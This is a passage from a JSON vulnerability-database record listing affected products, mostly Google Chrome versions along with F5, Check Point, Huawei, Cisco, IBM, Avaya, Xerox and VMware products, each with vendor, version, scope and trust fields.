"model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "gaia embedded r71.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "oceanstor vis6600t v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.15" }, { "model": "vcloud automation center application services", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.723.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.105" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.725.0" }, { "model": "oceanstor 9000e v100r002c19", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storefabric h-series switches", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.224" }, { "model": "ipso r70.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "email gateway patch", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.8" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.52" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.358.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.2" }, { "model": "vcenter infrastructure navigator", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.754.0" }, { "model": "ipso r75", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.58" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1007" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1659.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.783.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.19" }, { "model": "ios-xr", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1047" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1052" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.78" }, { "model": "gaia r70.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1690.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.687.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.308" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.820.0" }, { "model": "associates user activity reporting module", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1044.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.109" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "infosphere balanced warehouse c3000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.432.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.731.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.89" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.560.0" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.819.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.324.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1048" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1032.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.162" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.433.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.201" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.153" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.201" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1687.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.903.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.733.0" }, { "model": "gaia r76", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "vsphere storage appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.3" }, { "model": "t610 plus flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.749.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.113" }, { "model": "ediscovery identification and collection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.762.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.719.0" }, { "model": "siem enterprise security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.12" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.72" }, { "model": "secureplatform r70.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.271.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.813.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.7" }, { "model": "oceanstor dorado5100 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.237" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.211" }, { "model": "oceanstor s2600t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.673.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.622.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1063.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.187" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.383.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.790.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.465.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.319" }, { "model": "esight uc\u0026c v100r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.658.1" }, { "model": "vcenter server appliance patch", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.8" }, { "model": "fusionmanager v100r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.37" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "secureplatform r70.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.932.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.101" }, { "model": "oceanstor s6800t v100r005c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1064.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.0" }, { "model": "power hmc r7.8.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "vcenter converter standalone", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1651.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.6" }, { "model": "espace u2990 v200r001c10spc102", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1003.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.391.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.107" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1664.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.18" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "ios-xe for catalyst air-ct5760", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual pgw softswitch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "22000" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7238" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.2" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.755.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1031" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.18" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4" }, { "model": "pod orchestration suite", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "elog v100r003c01spc506", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1007.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.326.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1680.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.11" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.213" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.23" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1010" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.113" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.337" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.28" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere process server hypervisor edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.1" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7530061.121.225.06100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.29" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.3" }, { "model": "phaser", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78000" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.37" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1051" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.98" }, { "model": "oceanstor s5500t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "secureplatform r71.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.896.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.59" }, { "model": "secureplatform r71", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "secureplatform r70.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "socialcast on premise", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.152" }, { "model": "e6000 blade server bh620 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.417.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.218" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.334" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.657.0" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.0" }, { "model": "isoc v200r001c02spc203", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1049" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7242" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.331" }, { "model": "secureplatform r71.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.4" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9393" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1057" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1673.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.689.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.55" }, { "model": "qradar incident forensics mr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1288.0" }, { "model": "gtsoftx3000 v200r001c01spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.390.0" }, { "model": "rack server 